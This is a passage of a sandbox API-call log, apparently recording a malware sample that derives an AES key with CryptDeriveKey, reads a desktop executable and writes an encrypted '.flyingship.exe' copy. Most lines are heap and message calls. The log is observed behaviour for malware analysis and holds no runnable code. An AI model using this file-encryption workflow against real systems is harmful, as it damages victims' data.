hHeap=0x8a0000) returned 1 [0167.182] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0167.182] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0167.182] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0167.182] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0167.182] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0167.182] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec68 | out: hHeap=0x8a0000) returned 1 [0167.182] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0167.182] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0167.182] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0167.182] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0167.182] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0167.182] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0167.182] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0167.182] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0167.182] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0167.182] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0167.182] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0167.182] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0167.182] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0167.182] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0167.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0167.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0167.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0167.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0167.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0167.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0167.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0167.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0167.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0167.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0167.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0167.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0167.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0167.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0167.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0167.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0167.183] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0167.183] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x9bda08, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0167.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0167.184] GetProcAddress (hModule=0x74f20000, lpProcName="CryptDeriveKey") returned 0x74f63188 [0167.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0167.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0167.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0167.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0167.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0167.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0167.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0167.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0167.184] CryptDeriveKey (in: hProv=0x9c0c88, Algid=0x660e, hBaseData=0x90af58, dwFlags=0x1, phKey=0x87e808 | out: phKey=0x87e808*=0x90af18) returned 1 [0167.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0167.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0167.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0167.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0167.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0167.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0167.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0167.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0167.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0167.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0167.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0167.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0167.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0167.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0167.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0167.185] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0167.185] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0167.185] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0167.185] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0167.185] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0167.185] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0167.185] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0167.185] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0167.185] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec68 | out: hHeap=0x8a0000) returned 1 [0167.185] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0167.185] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0167.185] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0167.185] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0167.185] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0167.185] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0167.185] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0167.185] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0167.185] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0167.185] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0167.185] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0167.185] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0167.185] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0167.185] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.185] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.185] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.185] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.186] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.186] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0167.186] PeekMessageW (in: lpMsg=0x87e944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e944) returned 0 [0167.186] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0167.186] CryptDestroyHash (hHash=0x90af58) returned 1 [0167.186] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.186] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0167.186] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0167.186] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0167.186] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0167.188] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\testers.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\testers.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0167.188] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0167.188] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef40 | out: lpNewFilePointer=0x0) returned 1 [0167.188] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0167.188] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0167.188] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0167.188] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0167.188] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0167.188] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0167.188] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0167.188] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0167.188] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0167.188] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0167.188] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0167.188] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0167.189] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0167.189] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0167.190] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\testers.flyingship.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\testers.flyingship.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0167.191] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defb0 [0167.191] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0167.191] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0167.191] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0167.191] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0167.191] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0167.191] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0167.191] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0167.192] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0167.192] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90aed8 [0167.192] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0167.192] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0167.192] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0167.192] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0167.192] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0167.192] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef90 | out: lpNewFilePointer=0x0) returned 1 [0167.192] ReadFile (in: hFile=0x138, lpBuffer=0x9c5180, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0x9c5180*, lpNumberOfBytesRead=0x87efb8*=0x10000, lpOverlapped=0x0) returned 1 [0167.196] ReadFile (in: hFile=0x138, lpBuffer=0x9c5180, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0x9c5180*, lpNumberOfBytesRead=0x87efb8*=0x10000, lpOverlapped=0x0) returned 1 [0167.199] ReadFile (in: hFile=0x138, lpBuffer=0x9c5180, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0x9c5180*, lpNumberOfBytesRead=0x87efb8*=0x10000, lpOverlapped=0x0) returned 1 [0167.202] ReadFile (in: hFile=0x138, lpBuffer=0x9c5180, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0x9c5180*, lpNumberOfBytesRead=0x87efb8*=0x10000, lpOverlapped=0x0) returned 1 [0167.205] ReadFile (in: hFile=0x138, lpBuffer=0x9c5180, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0x9c5180*, lpNumberOfBytesRead=0x87efb8*=0x10000, lpOverlapped=0x0) returned 1 [0167.208] ReadFile (in: hFile=0x138, lpBuffer=0x9c5180, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0x9c5180*, lpNumberOfBytesRead=0x87efb8*=0x10000, lpOverlapped=0x0) returned 1 [0167.211] ReadFile (in: hFile=0x138, lpBuffer=0x9c5180, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0x9c5180*, lpNumberOfBytesRead=0x87efb8*=0x10000, lpOverlapped=0x0) returned 1 [0167.213] ReadFile (in: hFile=0x138, lpBuffer=0x9c5180, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0x9c5180*, lpNumberOfBytesRead=0x87efb8*=0x10000, lpOverlapped=0x0) returned 1 [0167.217] ReadFile (in: hFile=0x138, lpBuffer=0x9c5180, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0x9c5180*, lpNumberOfBytesRead=0x87efb8*=0x10000, lpOverlapped=0x0) returned 1 [0167.218] ReadFile (in: hFile=0x138, lpBuffer=0x9c5180, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0x9c5180*, lpNumberOfBytesRead=0x87efb8*=0x10000, lpOverlapped=0x0) returned 1 [0167.236] ReadFile (in: hFile=0x138, lpBuffer=0x9c5180, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0x9c5180*, lpNumberOfBytesRead=0x87efb8*=0x10000, lpOverlapped=0x0) returned 1 [0167.237] ReadFile (in: hFile=0x138, lpBuffer=0x9c5180, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0x9c5180*, lpNumberOfBytesRead=0x87efb8*=0x10000, lpOverlapped=0x0) returned 1 [0167.239] ReadFile (in: hFile=0x138, lpBuffer=0x9c5180, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0x9c5180*, lpNumberOfBytesRead=0x87efb8*=0x10000, lpOverlapped=0x0) returned 1 [0167.240] ReadFile (in: hFile=0x138, lpBuffer=0x9c5180, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0x9c5180*, lpNumberOfBytesRead=0x87efb8*=0xc800, lpOverlapped=0x0) returned 1 [0167.241] ReadFile (in: hFile=0x138, lpBuffer=0x9c5180, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0x9c5180*, lpNumberOfBytesRead=0x87efb8*=0x0, lpOverlapped=0x0) returned 1 [0167.264] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0167.264] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0167.265] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0167.265] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0167.265] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0167.265] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0167.265] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xdc800) returned 0x2500020 [0167.281] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0167.281] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0167.281] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0167.281] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0167.281] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0167.281] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0167.281] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0167.281] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0167.281] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0167.296] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.296] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0167.296] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.296] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0167.296] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0167.296] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0167.296] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0167.296] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0167.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded08 [0167.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0167.319] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0167.319] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0167.319] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0167.319] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0167.319] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0167.319] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0167.319] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0167.319] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0167.319] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0167.319] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0167.319] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0167.319] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0167.319] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0167.319] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0167.319] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0167.319] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0167.319] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0167.319] RtlAllocateHeap (HeapHandle=0x8a0000, 